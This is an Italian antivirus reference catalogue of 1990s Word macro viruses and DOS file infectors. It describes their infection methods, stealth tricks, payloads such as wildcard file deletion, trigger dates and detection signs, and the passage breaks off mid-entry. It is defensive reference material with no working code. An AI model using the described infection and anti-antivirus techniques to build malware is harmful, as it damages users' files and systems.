WM.BlackDeath " " Written on 6/6/1997 " Lo stesso giorno cancella i seguenti file: " C:\*.COM " " C:\*.EXE " " C:\WINDOWS\*.INI " " C:\WINDOWS\*.COM " " C:\WINDOWS\*.HLP " " C:\WINDOWS\*.CPL " C:\WINDOWS\*.BMP " " C:\AOL\ORGANIZER\*.* " " C:\AOL\LDB\*.* " [Word_AntiConcept.A] Nome del Virus: Word.AntiConcept.A. Tipo di Virus: Virus da macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 4 o 3. Criptato: No. Misura delle macro: 1.263 (1.216) Byte. Luogo d'origine: USA. Data d'origine: Estate 1997. Payload: No. Data d'attivazione: Nessuna. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.AntiConcept.A infetta il modello principale quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono salvati (File\Salva e File\Salva con nome). Word.AntiConcept.A disabilita il Concept virus eliminando alcune sue macro. Quando viene aperto un documento infetto per la prima volta Word.AntiConcept mostra: " Your system may or may not be clean. " " Please close CleanW and then open it again " Word.AntiConcept.A Φ una versione innaturalmente trasferita con File\New, persa nel suo gruppo di macro. Per la macro persa, Microsoft Word fa apparire un messaggio d'errore. [Word_Archer.A] Nome del Virus: Word.Archer.A. Tipo di Virus: Virus da macro di Word. Pseudonimo: ArchFiend. Piattaforma: Word 6/7. Numero di macro: 6. Criptato: No. Misura delle macro: 2.360 Byte. Luogo d'origine: USA. Data d'origine: Luglio 1997. Payload: Si. Data d'attivazione: 5. Password: Random. Rilevato In The Wild: No. DESCRIZIONE: Word.Archer.A infetta il modello principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti e salvati (File\Salva con nome). Word.Archer.A rimuove FileTemplates e ToolsCustomize per rendere pi∙ difficile il riconoscimento di un documento infetto (chiamata tecnica macro stealth). Quando un utente seleziona Tools\Macro, Word.Archer.A aggiunge il seguente commento a C:\AUTOEXEC.BAT: " echo BLOW ME! " Word.Archer.A inoltre controlla l'ora di sistema ed in caso sia 13 nel campo dei secondi, aggiunge una password ai documenti salvati. Se si trova un documento con una password sconosciuta, bisognerebbe scaricare una copia di WinWord Password Recovery Tool (wwprt). E' disponibile all'indirizzo: www.vdsarg.com. La seconda procedura, che Φ attivata il giorno 5 di ogni mese, cerca di cancellare i file nei sistemi Macintosh o di cancellare tutti i file bitmap (*.BMP) nella seguente directory: " C:\WINDOWS " [Word_Armadillo.A] Nome del Virus: Word.Armadillo.A. Tipo di Virus: Virus da macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 4. Criptato: Si. Misura delle macro: 1.265 Byte. Luogo d'origine: USA. Data d'origine: Primavera 1997. Payload: Si. Data d'attivazione: Luned∞. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.Armadillo.A infetta il modello principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono salvati (File\Salva con nome). Word.Armadillo usa Tools\Macro per rendere pi∙ difficile il riconoscimento di un documento infetto (chiamata tecnica macro stealth). Se un utente seleziona Tools\Macro, Armadillo aggiunge 10.000 volte al documento aperto il seguente testo: " Armadillon Macro? " Quando un utente apre Microsoft Word di martedi ed il modello principale Φ infetto, Armadillo mostra il seguente messaggio: " Liven up Monday with an Armadillon! " [Word_Cult.A] Nome del Virus: Word.Cult.A. Tipo di Virus: Virus da macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 1. Criptato: No. Misura delle macro: 1.688 Byte. Luogo d'origine: Germania. Data d'origine: Estate 1997. Distruttivo: No. Data d'attivazione: Nessuna. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.Cult.A Φ un altro virus da macro. Per un bug di programmazione del codice, non infetta altri file. Nel codice virale pu≥ essere trovato il seguente messaggio: " CULT! Nightmare Joker (SLAM) " [Word_CVCK1.A] Nome del Virus: Word.CVCK1.A. Tipo di Virus: Virus da macro di Word. Pseudonimo: Chicken-Pox 0.1. Piattaforma: Word 6/7. Numero di macro: 11. Criptato: Si. Misura delle macro: 7.315 Byte. Luogo d'origine: Indonesia. Data d'origine: 1997. Distruttivo: No. Data d'attivazione: Nessuna. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.CVCK1.A infetta il modello principale (normal.dot) quando viene chiuso un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). Word.CVCK1.A usa Tools\Macro, Strumenti\Customize e FileTemplates per rendere pi∙ difficile il riconoscimento di un documento infetto (chiamata tecnica macro stealth). Quando un utente seleziona una delle opzioni, Word.CVCK1.A mostra quanto segue: " Chicken say ......... " una figura vuota e " [pox-poX-pOX-POX-POx-Pox-pox] "", .Push2 I seguenti commenti possono essere trovati nel codice del virus: " -------------------------------------------- " " Created using CVCK v.01 b " " (C)CrazybitS 1997, Yogyakarta, Indonesia " " -------------------------------------------- " e " Sorry ... i'm defeat you ! " [Word_CVCK1.B] Nome del Virus: Word.CVCK1.B. Tipo di Virus: Virus da macro di Word. Pseudonimo: Foxz. Piattaforma: Word 6/7. Numero di macro: 10. Criptato: Si. Misura delle macro: 5.551 Byte. Luogo d'origine: Indonesia. Data d'origine: 1997. Payload: Si. Data d'attivazione: Nessuna. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.CVCK1.B infetta il modello principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). Word.CVCK1.B usa Tools\Macro e FileTemplates per rendere pi∙ difficile il riconoscimento di un documento infetto (chiamata tecnica macro stealth). Quando un utente seleziona una delle opzioni, Word.CVCK1.B mostra quanto segue: " Err = 0 " Un altro messaggio viene mostrato i giorni 1 e 3 di ogni mese. Word.CVCK1.B cerca di disabilitare le funzioni di stampa, la domenica. I seguenti commenti possono essere trovati nel codice del virus: " Foxz members of NoMercy " " thank's for decrypt this virus " " you may learn the effect Or somthing Else " " bye,"."".""." " " Foxz " " If you found bug please contact me at " " idban"@" hotmail.com " e " Foxz Techno " " Member Of NoMercy " [Word_CVCK1.C] Nome del Virus: Word.CVCK1.C. Tipo di Virus: Virus da macro di Word. Pseudonimo: Vampire, 80e. Piattaforma: Word 6/7. Numero di macro: 6 o 9 (modello principale). Criptato: Si. Misura delle macro: 3.158 (5.759) Byte. Luogo d'origine: Indonesia. Data d'origine: 1997. Distruttivo: Si. Data d'attivazione: Venerd∞. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.CVCK1.C infetta il modello principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). Word.CVCK1.C usa Tools\Macro, ToolCustomize e FileTemplates Quando un utente seleziona una delle opzioni, Word.CVCK1.C cancella tutti i file WIN.* nella directory Windows e mostra il seguente messaggio : " No risk, No Pain " Un'altra procedura viene attivata il venerd∞, quando Word.CVCK1.C cancella tutto il testo dai documenti. I seguenti commenti possono essere trovati nel codice di Word.CVCK1.C: " Created using CVCK v.01 b " " (C)CrazybitS 1997, Yogyakarta, Indonesia " " Name : WM.80e Pseudonimoe Vampire " [Word_CVCK1.D] Nome del Virus: Word.CVCK1.D. Tipo di Virus: Virus da macro di Word. Pseudonimo: Vampire, 80e. Piattaforma: Word 6/7. Numero di macro: 6 o 9 (modello principale). Criptato: Si. Misura delle macro: 3.912 (5.547) Byte. Luogo d'origine: Indonesia. Data d'origine: 1997. Payload: Si. Data d'attivazione: Il giorno 13 di ogni mese. Password: Nessuna Rilevato In The Wild: No DESCRIZIONE: Word.CVCK1.D infetta il modello principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). Word.CVCK1.D usa Tools\Macro, ToolCustomize e FileTemplates per rendere pi∙ difficile il riconoscimento di un documento infetto (chiamata tecnica macro stealth). Quando un utente seleziona una delle opzioni, Word.CVCK1.D mostra il seguente messaggio (mostrato anche il giorno 13 di ogni mese): " Visit NoMercy WEB PAGE ! " " Welcome Again buddy! " " It's nice create a Virus, why you don't try? " I seguenti commenti possono essere trovati nel codice di Word.CVCK1.D: " -------------------------------------------- " " Created using CVCK v.01 b " " (C)CrazybitS 1997, Yogyakarta, Indonesia " " -------------------------------------------- " " greeting to " " -Cicatrix major collector " " -D.Giovanni " " -All Macro virii creator " " -You that has seen the decription macro " e " Sorry ... i'm defeat you ! " [Word_CVCK1.E] Nome del Virus: Word.CVCK1.E. Virus type: Virus da macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 10. Criptato: Si. Misura delle macro: 5.527 Byte. Luogo d'origine: Indonesia. Data d'origine: 1997. Payload: Si. Data d'attivazione: Domenica. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: La principale differenza tra questa nuova versione e Word.CVCK1.B Φ che le macro Action, Actiondate, e AutoOpen sono state modificate. Word.CVCK1.E infetta il modello principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). Word.CVCK1.E usa Tools\Macro e FileTemplates per rendere pi∙ difficile il riconoscimento di un documento infetto (chiamata tecnica macro stealth). Word.CVCK1.E cerca inoltre di disabilitare le funzioni di stampa, la domenica. Il seguente commento pu≥ essere trovato nel codice di Word.CVCK1.E: " -------------------------------------------- " " Hey you..... " " This again from NoMercy... " " created by Fox`z " " -------------------------------------------- " [Word_CVCK1.F] Nome del Virus: Word.CVCK1.F. Virus type: Virus da macro di Word. Pseudonimo: Billy Mahone. Piattaforma: Word 6/7. Numero di macro: 6 o 9 (modello principale). Criptato: Si. Misura delle macro: 2.209 o 2.338 Byte. Luogo d'origine: Sconosciuto. Data d'origine: 1997. Payload: Si. Data d'attivazione: Il giorno 13 di ogni mese. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.CVCK1.F sembra essere il primo virus da macro creato con il generatore di virus CVCK1, il quale non Φ pi∙ stato modificato. Word.CVCK1.F infetta il modello principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). Word.CVCK1.F usa Tools\Macro, ToolsCustomize e FileTemplates per rendere pi∙ difficile il riconoscimento di un documento infetto (chiamata tecnica macro stealth). Quando Word.CVCK1.F Φ attivo (il giorno 13 di ogni mese), mostra il seguente messaggio: " Billy Mahone is back!!! " (il nome dell'autore Φ identificabile in un personaggio del film " Flatliners "). Il seguente commento pu≥ essere trovato nel codice di Word.CVCK1.G: " Sorry ... i'm defeat you ! " e " Just bypass Nothing to do! " [Word_CVCK1.G] Nome del Virus: Word.CVCK1.G. Tipo di Virus: Virus da macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 5. Criptato: Si. Misura delle macro: 2.029 Byte. Luogo d'origine: Sconosciuto. Data d'origine: 1997. Payload: Si. Data d'attivazione: Il giorno 13 di ogni mese. Password: Nessuno. Rilevato In The Wild: No. DESCRIZIONE: Word.CVCK1.G sembra essere un'altra creazione dell'autore di Word.CVCK1.F. Contiene un altro riferimento al film "Flatliners." Word.CVCK1.G infetta il modello principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). Quando Word.CVCK1.G Φ attivo (il giorno 13 di ogni mese), mostra il seguente messaggio: " Put me in the sate of death " Il seguente commento pu≥ essere trovato nel codice di Word.CVCK1.G: " Sorry ... i'm defeat you ! " e " Just bypass Nothing to do! " [Word_CVCK1.H] Nome del Virus: Word.CVCK1.H. Tipo di Virus: Virus da macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 5. Criptato: Si. Misura delle macro: 2.031 Byte. Luogo d'origine: Sconosciuto. Data d'origine: 1997. Payload: Si. Data d'attivazione: Il giorno 13 di ogni mese. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.CVCK1.H sembra essere un'altra creazione dell'autore di Word.CVCK1.F e Word.CVCK1.G! Contiene un altro riferimento al film "Flatliners". Word.CVCK1.H infetta il modello principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). When Word.CVCK1.H Φ attivo (il giorno 13 di ogni mese), mostra il seguente messaggio: " Today is a good day to die!!! " Il seguente commento pu≥ essere trovato nel codice di Word.CVCK1.H: " Sorry ... i'm defeat you ! " e " Just bypass Nothing to do! " [Word_CVCK1.I] Nome del Virus: Word.CVCK1.I. Tipo di Virus: Virus da macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 11. Criptato: Si. Misura delle macro: 7.329 Byte. Luogo d'origine: Sconosciuto. Data d'origine: 1997. Payload: Si. Data d'attivazione: I giorni 11 e 31 di ogni mese. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: La principale differenza di questa nuova versione ed il precedente virus Word.CVCK1.A e cheil codice Φ stato leggermente cambiato. Per ulteriori informazioni, fare riferimento alla descrizione del virus Word.CVCK1.A. [Word_Czech.A] Nome del Virus: Word.Czech.A. Tipo di Virus: Virus da macro di Word. Pseudonimo: Nessuno. Piattaforma: Word 6/7. Numero di macro: 2. Criptato: Si. Misura delle macro: 424 Byte. Luogo d'origine: Sconosciuto. Data d'origine: Primavera 1997. Payload: Nessuno. Data d'attivazione: Nessuna. Password: Nessuna. Rilevato In The Wild: No. DESCRIZIONE: Word.CVCK1.H infetta il modello principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti e salvati (File\Salva). Word.Czech.A Φ un altro virus da macro che non ha effetti, se non quello di essere contagioso. [Version] Nome del Virus: Version. Tipo di Virus: Residente in memoria, Virus da file (file con estensione *.COM). Lunghezza del Virus: 708 Byte. PC Vector Hooked: INT 21h. Procedura eseguita: 1) Decodifica i primi suoi tre Byte. 2) Controlla che sia in memoria. Se "SI", torna direttamente alla funzione originale. Altrimenti si carica nella memoria alta, intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21h (AH=30h) per mostrare una versione di DOS non corretta. 2) Intercetta l'INT 21h (AX=4203h) per verificare che sia in memoria (returns AX=6969h). 3) Intercetta l'INT 21h (AX=4B00h) per infettare i file con estensione *.COM. Danni: La chiamata per recuperare la versione del DOS non funziona correttamente. Note: Questo virus non funziona correttamente a causa di errori nel suo codice di programmazione. Metodo di rilevazione: 1) Data ed ora dei file infetti non vengono modificate. 2) I file infetti aumentano di 705 Byte. [Versikee-1326] Nome del Virus: Versikee-1326. Tipo di Virus: Virus da file (file con estensione *.EXE). Lunghezza del Virus: 1.326 Byte. Procedura eseguita: Cerca i file con estensione *.EXE e li infetta (infetta solo un file alla volta). Il percorso di ricerca va dalla directory corrente alla sua subdirectory, dalle subdirectory sotto l'ultima subdirectory, alla directory principale, alle subdirectory sotto la directory principale. Se c'Φ un file infettabile, controlla l'ora di sistema. Se il valore dei secondi Φ un multiplo di 8, il virus distrugge i primi 5 Byte del file. Altrimenti lo infetta solamente. Quindi torna alla funzione originale. Danni: Distrugge i primi 5 Byte del file a seconda del valore riscontrato nel campo dei secondi. Note: Data ed ora dei file infetti non vengono modificate. Metodo di rilevazione: Aumenta la lunghezza dei file infetti. L'algoritmo Φ: Allunga il file originale per farlo diventare un multiplo di 16, quindi aumenta la sua lunghezza di 1.326 Byte. [163] Nome del Virus: 163. Tipo di Virus: Virus da file (file con estensione *.COM). Lunghezza del Virus: 163 Byte. Procedura eseguita: 1) Infetta i file con estensione *.COM non infetti nella directory corrente. Se non ci sono file con estensione *.COM nella directory corrente o almeno un file Φ giα stato infettatto, il virus torna alla funzione originale. Metodo di infezione: (1) Sposta i primi 163 Byte del file originale alla fine. (2) Scrive il codice virale sui primi 163 Byte. Il file originale diventa inutilizzabile se Φ minore di 163 Byte. Danni: Nessuno. Note: 1) Non infetta lo stesso file. 2) Data ed ora dei file infetti non vengono modificate. Metodo di rilevazione: 1) I file infetti aumentano di 163 Byte. 2) Cerca i file con estensione *.COM partendo dal Byte 19Dh del file. [Vengence-A] Nome del Virus: Vengence-A. Other Name: Vengence-194. Tipo di Virus: Virus da file (*.C* file). Lunghezza del Virus: 194 Byte. Procedura eseguita: Infetta tutti i file *.C* nella directory corrente. Metodo di infezione: Sovrascrive i primi 194 Byte del file con il codice del virus. Se il file originale Φ inferiore a 194 Byte, il file diventa di 194 Byte dopo l'infezione; altrimenti la lunghezza non cambia. Danni: Sovrascrive i primi 194 Byte del file con il codice del virus, questo rende inutilizzabile il file. Metodo di rilevazione: 1) Data ed ora dei file infetti vengono cambiate. 2) Il seguente testo pu≥ essere trovato alla fine dei file infetti: "Vengence-A virus. Lastest release from Swedish Virus Association. Released 7th of May 1992. Happy hacking and greetings to all Virus writers..." [Vengence-B] Nome del Virus: Vengence-B. Other Name: Vengence-252. Tipo di Virus: Virus da file (*.C*, soprattutto i file con estensione *.COM). Lunghezza del Virus: 252 Byte. Procedura eseguita: Infetta tutti i file *.C* nella directory corrente. Metodo di infezione: Sovrascrive i primi 252 Byte del file con il codice del virus. Se il file originale Φ inferiore a 252 Byte, il file diventa di 252 Byte dopo l'infezione; altrimenti la lunghezza non cambia. Danni: Sovrascrive i primi 252 Byte del file con il codice del virus, questo rende inutilizzabile il file. Note: Data ed ora dei file infetti non vengono modificate. Metodo di rilevazione: Il seguente testo pu≥ essere trovato alla fine dei file infetti: "Vengence-B virus. Lastest release from Swedish Virus Association. Released 8th of May 1992. Satan will come and rule his world and his people!" [Vengence-C] Nome del Virus: Vengence-C. Other Name: Vengence-390. Tipo di Virus: Virus da file (*.C*, soprattutto i file con estensione *.COM). Lunghezza del Virus: 390 Byte. Procedura eseguita: Infetta il primo file *.C* nella directory corrente. Metodo di infezione: Sovrascrive i primi 390 Byte del file con il codice del virus. Se il file originale Φ inferiore a 390 Byte, il file diventa di 390 Byte dopo l'infezione; altrimenti la lunghezza non cambia. Danni: Sovrascrive i primi 390 Byte del file con il codice del virus, questo rende inutilizzabile il file. Note: 1) Data ed ora dei file infetti non vengono modificate. 2) Quando il virus viene eseguito, dapprima controlla che sia presente un anti-virus come F-LOCK, F-POPUP, F-FCHK, F-DLOCK, ThunderByte e TBSCANX. Il virus sospende la propria esecuzione se Φ presente uno di questi antivirus. Metodo di rilevazione: Il seguente testo pu≥ essere trovato alla fine dei file infetti: "Vengence-C virus. Lastest release from Swedish Virus Association. Released 8th of May 1992. Satan will come and rule his world and his people!" [Vengence-D] Nome del Virus: Vengence-D. Other Name: Vengence-435. Tipo di Virus: Virus da file (*.C*, soprattutto i file con estensione *.COM). Lunghezza del Virus: 435 Byte. Procedura eseguita: 1) Controlla che l'ora corrente sia 12:00. Se "SI", mostra il seguente messaggio e fa aumentare l'ora di sistema di un ora. "Vengence-D virus. Lastest release from Swedish Virus Association. Released 8th of May 1992. Satan will come and rule his world and his people!" 2) Infetta il primo file *.C* nella directory corrente. Metodo di infezione: Sovrascrive i primi 435 Byte del file con il codice del virus. Se il file originale Φ inferiore a 435 Byte, il file diventa di 435 Byte dopo l'infezione; altrimenti la lunghezza non cambia. Danni: Sovrascrive i primi 435 Byte del file con il codice del virus, questo rende inutilizzabile il file. Note: 1) Data ed ora dei file infetti non vengono modificate. 2) Quando il virus viene eseguito, dapprima controlla che sia presente un anti-virus come F-LOCK, F-POPUP, F-FCHK, F-DLOCK, ThunderByte e TBSCANX. Il virus sospende la propria esecuzione se Φ presente uno di questi antivirus. Metodo di rilevazione: Il seguente testo pu≥ essere trovato alla fine dei file infetti: "Vengence-D virus. Lastest release from Swedish Virus Association. Released 8th of May 1992. Satan will come and rule his world and his people!" . [Vengence-F] Nome del Virus: Vengence-F. Other Name: Vengence-656. Tipo di Virus: Virus da file (*.C*, soprattutto i file con estensione *.COM). Lunghezza del Virus: 656 Byte. Procedura eseguita: 1) ) Controlla che l'ora corrente sia 12:00. Se "SI", mostra il seguente messaggio e fa aumentare l'ora di sistema di un ora. "Vengence-F virus. Debugging session unlimited." 2) Infetta il primo file che si trova nella cartella corrente, in quella precedente e cos∞ via. Metodo di infezione: Sposta i primi 656 Byte del file alla fine di questo, quindi scrive il codice del virus sui primi 656 Byte. Infine unisce "SVC" alla fine del file. Danni: I file infetti non possono essere eseguiti. Note: 1) Data ed ora dei file infetti non vengono modificate. 2) Quando viene eseguito, il virus controlla: - che sia stato individuato da Debug. Se "SI" blocca il sistema. - che sia presente un anti-virus come F-LOCK, F-POPUP, F-FCHK, F-DLOCK, ThunderByte e TBSCANX. Se "SI", il virus sospende la propria esecuzione. Metodo di rilevazione: 1) Ricerca del testo sopra menzionato. 2) Ricerca della parola "SVC" alla fine dei file infetti. 3) I file infetti aumentano di 656 Byte. Metodo di pulizia: Cancellare i primi 656 Byte e "SVC" alla fine dei file infetti. Se il file Φ pi∙ lungo di 656 Byte, spostare gli ultimi 656 Byte all'inizio. [V500] Nome del Virus: V500. Tipo di Virus: In memoria (OS), Virus da file (file con estensione *.COM). Lunghezza del Virus: 500 Byte. Vettore PC agganciato: INT 21H. Procedura eseguita: Il virus controlla che la versione del DOS sia la 3.3. Se "NO", torna direttamente alla funzione originale, altrimenti rimane in memoria (nell'area OS). Il virus richiama l'INT 86h per infettare i file con estensione *.COM quando l'INT 00h-0Ch viene chiamato. Quindi torna alla funzione originale. Il virus reinfetta i file. Metodo di infezione: Il virus sposta i primi 500 Byte del file alla fine e scrive il codice virale all'inizio. Danni: Nessuno. Note: Data ed ora dei file infetti non viene modificata. Metodo di rilevazione: I file infetti aumentano di 500 Byte. [Crazy-L15] Nome del Virus: Crazy-I15. Tipo di Virus: In memoria (Memoria alta), Virus da file (file con estensione *.COM). Lunghezza del Virus: 1.402 Byte. Vettore PC agganciato: Int 21h, INT 24h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 21h. 3) Torna alla funzione originale. Metodo di infezione: Intercetta l'INT 21H(AH=4Bh) per infettare i file. Dapprima blocca l'INT 24h per evitare di lasciare tracce quando Φ in fase di scrittura, quindi controlla che il programma da eseguire sia un file con estensione *.COM. Se "SI" il virus lo infetta. Infine ripristina l'INT 24h. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.402 Byte. [Variety] Nome del Virus: Variety. Tipo di Virus: Virus da file (file con estensione *.COM). Lunghezza del Virus: 625 Byte. Procedura eseguita: 1) Il virus decodifica. 2) Infetta un file con estensione *.COM nella directory corrente (infetta solo un file alla volta). Metodo di infezione: 1) Codifica il codice del virus. 2) Aggiunge il codice del virus alla fine del file originale. Danni: Nessuno. Note: 1) Se la versione del DOS non Φ superiore alla 2.0, il virus non infetta i file. 2) Data ed ora dei file infetti non vengono modificate. Metodo di rilevazione: I file infetti aumentano di 625 Byte. [Infector] Nome del Virus: Infector. Tipo di Virus: Virus da file (file con estensione *.COM). Lunghezza del Virus: 820-830 Byte. Procedura eseguita: Cerca un file con estensione *.COM non infetto nella directory corrente e procede alla sua infezione (infetta solo un file alla volta). Danni: Nessuno. Note: 1) La maggior parte dei file infetti non possono essere eseguiti a causa della bassa qualitα di procedura del codice virale. 2) Non residente in memoria. 3) Compare un messaggio d'errore quando si scrive perchΘ l'INT 24h non Φ stato bloccato. Metodo di rilevazione: I file infetti aumentano di 820 fino a 830 Byte. [Irish-3] Nome del Virus: Irish-3. Tipo di Virus: Virus da file (file con estensione *.COM). Lunghezza del Virus: 1.164 Byte. Vettore PC agganciato: INT 21h, INT 1Ch. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 21h, l'INT 1Ch e torna alla funzione originale. Metodo di infezione: Intercetta l'INT 21H(AH=4Bh) per infettare i file. Controlla che il programa da eseguire sia un file con estensione *.COM. Se "SI", il virus lo infetta. Se Φ un file con estensione *.EXE, il virus crea un nuovo file con estensione *.COM (di lunghezza compresa tra 2.000 e 4.000 Byte) con lo stesso nome del file con estensione *.EXE originale. Il nuovo file con estensione *.COM contiene il codice del virus. Danni: Nessuno. Note: 1) Se la data corrente Φ il giorno 21 novembre, calcola l'ora intercettando l'INT 08h. Dopo pochi minuti, mostra il seguente messaggio : "Virus V2.0 (c) 1991 Necros The Hacher Written on 29,30 June.................................. ...................." 2) Quando si scrive pu≥ apparire un messaggio d'errore perchΦ l'INT 24h non Φ stato bloccato. Metodo di rilevazione: I file infetti aumentano di 1.164 Byte. [101] Nome del Virus: 101. Tipo di Virus: Virus da file. Lunghezza del Virus: 2.560 Byte. Procedura eseguita: Quando tutti i file con estensione *.COM ed *.EXE nel disco in uso sono stati infettati, il virus controlla la data di sistema per verificare che sia un multiplo di 9 (per esempio il giorno 9, 18, 27). Se "SI", tutto il testo sullo schermo diviene confuso ed Φ spostato in basso. Se "NO" il virus modifica il settore di boot e continua ad infettare altri drive. Danni: Tutti i file con estensione *.COM ed *.EXE vengono infettati ed aumentano di 2.560 Byte. I file infetti contengono la stringa: "VIRUS 101". [1339] Nome del Virus: 1339. Pseudonimo: Vacsina virus. Tipo di Virus: Virus parassita. Lunghezza del Virus: 1.339 Byte. Sintomi: Aumenta la lunghezza dei file con estensione *.COM infetti di 1.339 Byte ed i file con estensione *.EXE di 1.471 Byte. I file infetti contengono la parola "VACSINA". Diminuisce la memoria RAM libera. Danni: Nessun danno, nessuna manipolazione. Note: Dapprima verifica che sia giα caricato in memoria. (per far questo usa l'interrupt vettoriale 31h). Se "NO", si installa prima del programma infetto (usando la modifica MCB, colloca 1.344 Byte). Dopo l'installazione il virus controlla la funzione DOS EXEC ed infetta tutti i programmi non infetti. Questo virus appartiene ad un gruppo di virus che collaborano tra di loro. Questo gruppo contiene ogni virus del proprio livello. Un virus pu≥ rimuovere un altro Vacsina di livello minore di 10h. Pu≥ eliminare virus con valori minori di 10h. Per diffondersi, un virus Vacsina usa direttamente l'interrupt 21h. [1701/1704] Nome del Virus: 1701/1704. Pseudonimo: Raindrop virus. Tipo di Virus: Virus parassita. Lunghezza del Virus: 1.701/1.704 Byte. Sintomi: Aumenta la lunghezza i file con estensione *.COM infetti di 1.701/1.704 Byte quando la data di sistema Φ compresa tra ottobre e dicembre 1988. Cinque minuti dopo l'installazione, il virus individua tutti i caratteri presenti sullo schermo e li fa cadere uno ad uno. Danni: Non fa danni. Il sistema si blocca dopo che il virus viene attivato. [2881] Nome del Virus: 2881. Pseudonimo: Yankee Doodle virus. Tipo di Virus: Virus parassita. Lunghezza del Virus: 2.881 Byte. Sintomi: Aumenta la lunghezza dei file infetti di circa 2.881 Byte e diminuisce la memoria RAM libera. I file con estensione *.COM infetti mostrano 7A4Fh e 2Ch come parole finali (flag per altri virus, per esempio per i virus Vacsina). Il virus fa suonare "Yankee Doodle" quando diverse varianti sono presenti contemporaneamente (vedere danni). Danni: Modificazione Ping-Pong del virus: modifica il virus Ping-Pong in memoria. Cambia due Byte, una regolazione ed aggiunge una subroutine. Scrive il conteggio su tutti i dischi e dopo 255 riavvii, il virus Ping-Pong esce dalla memoria (ritorna all'originale interrupt vettoriale 13h e al valore 0:413h). Subito dopo viene suonata la canzone "Yankee Doodle". [2928] Nome del Virus: 2928. Pseudonimo: Yankee Doodle virus. Tipo di Virus: Virus parassita. Lunghezza del Virus: 2.928 Byte. Sintomi: Aumenta la misura dei file infetti di circa 2.928 Byte e diminuisce la memoria RAM libera. I file con estensione *.COM infetti mostrano 7A4Fh e come parole finali (flag per altri virus, per esempio: per i virus Vacsina). Il virus fa suonare "Yankee Doodle" quando diverse varianti sono presenti insieme (vedere danni). Danni: Modificazione Ping-Pong del virus: modifica il virus Ping-Pong in memoria. Cambia due Byte, una regolazione ed aggiunge una subroutine. Scrive il conteggio su tutti i dischi e dopo 255 riavvii, il virus Ping-Pong esce dalla memoria (ritorna all'originale interrupt vettoriale 13h e al valore 0:413h). Subito dopo viene suonata la canzone "Yankee Doodle". Caratteristiche particolari: Sembra che questo virus sia una versione vecchia del virus 2881. Fa inoltre parte di un grande gruppo di virus. Con il proprio livello 29h Φ un'edizione precedente dello stesso virus. Ha lo stesso meccanismo, causa gli stessi danni (eccezion fatta per il virus 2881 che non suona la melodia quotidianamente, quindi non viene subito rilevato). Il codice del virus 2881 Φ ottimizzato, cosicchΦ la nuova edizione Φ pi∙ corta (di circa 47 Byte). [3584] Nome del Virus: 3584. Pseudonimo: Fish 6. Tipo di Virus: Virus parassita, Residente in memoria. Lunghezza del Virus: 3.584 Byte. Sintomi: Aumenta la misura dei file infetti di 3.584 Byte. Diminuisce la memoria RAM libera di 6KB. Danni: Il virus mostra sullo schermo il seguente messaggio: "FISH VIRUS #6 - EACH DIFF BONN 2/90 '~knzyvo}'" usando la funzione 9 dell'interrupt 21h e blocca il sistema usando l'istruzione HLT. [4096] Nome del Virus: Virus 4096. Tipo di Virus: Virus da file. Lunghezza del Virus: 4.096 Byte. Procedura eseguita: Viene modificato il settore di boot se la data di sistema Φ sucessiva al giorno 21 settembre. Avviando con un disco infetto, compare sullo schermo il seguente messaggio: "FRODO LIVES". Il codice del virus non Φ perfetto, quindi eseguendo un file infetto dopo il 21 settembre, le aree di sistema non sono modificate ma il virus pu≥ causare il blocco del sistema. Danni: Il virus infetta i file con estensione *.COM minori di 61.440 Byte ed i file con estensione *.EXE. Utilizzando i flag, fa aumentare la data dei file di 100 anni. (DOS riporta solo le ultime due cifre digitate, quindi non Φ facilmente diagnosticabile eseguendo, per esempio, il comando DIR). Metodo di rilevazione: Il virus aumenta la misura dei file infetti di 4.096 Byte. La memoria Φ diminuita di circa 6 KB. [534] Nome del Virus: 534. Tipo di Virus: Virus parassita. Lunghezza del Virus: 534 Byte. Sintomi: Il virus infetta i file con estensione *.COM nella directory corrente o nella directory principale che siano maggiori di 256 Byte e minori di 64.000 Byte. Aumenta la misura dei file infetti di 534 Byte ed i file contengono la seguente stringa: "????????.COM". [April 1st] Nome del Virus: April 1st. Pseudonimo: 